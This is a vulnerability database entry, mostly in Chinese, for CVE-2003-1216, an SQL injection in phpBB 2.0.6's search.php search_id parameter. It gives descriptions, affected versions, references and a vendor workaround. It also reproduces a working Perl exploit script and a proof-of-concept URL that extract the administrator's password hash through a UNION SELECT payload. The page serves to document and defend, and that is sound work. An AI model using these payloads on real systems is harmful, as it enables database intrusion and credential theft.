CVE-2003-1216
CVSS7.5
发布时间 :2003-11-27 00:00:00
修订时间 :2016-10-17 22:39:34
NMCOES    

[原文]SQL injection vulnerability in search.php for phpBB 2.0.6 and earlier allows remote attackers to execute arbitrary SQL and gain privileges via the search_id parameter.


[CNNVD]phpBB search.php SQL远程注入漏洞(CNNVD-200311-093)

        
        phpBB2是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB2包含的search.php对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可以获得系统敏感信息。
        问题是search.php脚本对"search_id"参数缺少充分过滤,攻击者可以提交包含恶意SQL命令给这个参数,可导致修改原有的SQL逻辑,获得数据库信息或修改数据库。经过测试,可利用此漏洞获得管理员密码HASH信息,并修改COOKIE信息以管理员权限访问系统。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:1.2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1216
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1216
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-093
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106997132425576&w=2
(UNKNOWN)  BUGTRAQ  20031127 phpBB 2.06 search.php SQL injection
http://marc.info/?l=bugtraq&m=107005608726609&w=2
(UNKNOWN)  BUGTRAQ  20031128 [Hat-Squad] phpBB search_id injection exploit
http://marc.info/?l=bugtraq&m=107196735102970&w=2
(UNKNOWN)  BUGTRAQ  20031220 phpBB v2.06 search_id sql injection exploit
http://www.phpbb.com/phpBB/viewtopic.php?t=153818
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=153818
http://www.securityfocus.com/bid/9122
(VENDOR_ADVISORY)  BID  9122
http://xforce.iss.net/xforce/xfdb/13867
(VENDOR_ADVISORY)  XF  phpbb-searchphp-sql-injection(13867)

- 漏洞信息

phpBB search.php SQL远程注入漏洞
高危 输入验证
2003-11-27 00:00:00 2005-10-20 00:00:00
远程  
        
        phpBB2是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB2包含的search.php对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可以获得系统敏感信息。
        问题是search.php脚本对"search_id"参数缺少充分过滤,攻击者可以提交包含恶意SQL命令给这个参数,可导致修改原有的SQL逻辑,获得数据库信息或修改数据库。经过测试,可利用此漏洞获得管理员密码HASH信息,并修改COOKIE信息以管理员权限访问系统。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 打开search.php脚本,查找如下代码:
        if ( intval($search_id) )
        {
        $sql = "SELECT search_array
        FROM " . SEARCH_TABLE . "
        WHERE search_id = $search_id
        AND session_id = '". $userdata['session_id'] . "'";
        并使用如下代码代替如上代码:
        $search_id = intval($search_id);
        if ( $search_id )
        {
        $sql = "SELECT search_array
        FROM " . SEARCH_TABLE . "
        WHERE search_id = $search_id
        AND session_id = '". $userdata['session_id'] . "'";
        厂商补丁:
        phpBB Group
        -----------
        下载最新的2.06版本:
        
        http://www.phpbb.com

- 漏洞信息 (137)

phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit (EDBID:137)
php webapps
2003-12-21 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl -w
use IO::Socket;
##    PROOF-OF-CONCEPT
##    * work only with mysql ver > 4.0
##    * work only with post #1 
##
##    Example:
##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
##    [~] prepare to connect...
##    [+] connected
##    [~] prepare to send data...
##    [+] OK
##    [~] wait for response...
##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,
97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,
105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,
59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,
58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,
104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&amp/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o


# milw0rm.com [2003-12-21]
		

- 漏洞信息

2875
phpBB search.php search_id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

phpBB and prior contains a flaw that allows an attacker to manipulate SQL queries and potentially gain administrative control over the forum. The "search.php" script of the application does not sufficiently sanitize the input of the "search_id" parameter. This can be exploited to gain information such as password hashes and more.

- 时间线

2003-11-27 Unknow
2003-11-27 Unknow

- 解决方案

Upgrade to version 2.06 found on the vendor site or higher, as it has been reported to fix this vulnerability. It is important to note that the issue was fixed and the version number was not incremented. It is also possible to correct the flaw by implementing the workaround provided by the vendor.

- 相关参考

- 漏洞作者

- 漏洞信息

phpBB search.php SQL Injection Vulnerability
Input Validation Error 9122
Yes No
2003-11-27 12:00:00 2009-07-12 12:56:00
The disclosure of this issue has been credited to Niels Teusink <n.teusink@planet.nl>. Exploit code has been supplied by RusH security team <www.rsteam.ru>. This issue is also reported to have independently discovered by rick patel <rikul7@yahoo.com>.

- 受影响的程序版本

phpBB Group phpBB 2.0.6

- 漏洞讨论

It has been reported that phpBB may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database.

phpBB version 2.06 has been prone to this issue, however other versions may be affected as well.

- 漏洞利用

The following proof of concept has been supplied by Hat-Squad Security Team:

http://www.example.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58
,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,9
7,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58
,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111
,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter uid]/*

The following exploit has been provided:

- 解决方案

It has been reported that the vendor has patched version 2.06. Users are advised to download the fixed 2.06 version of the software.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站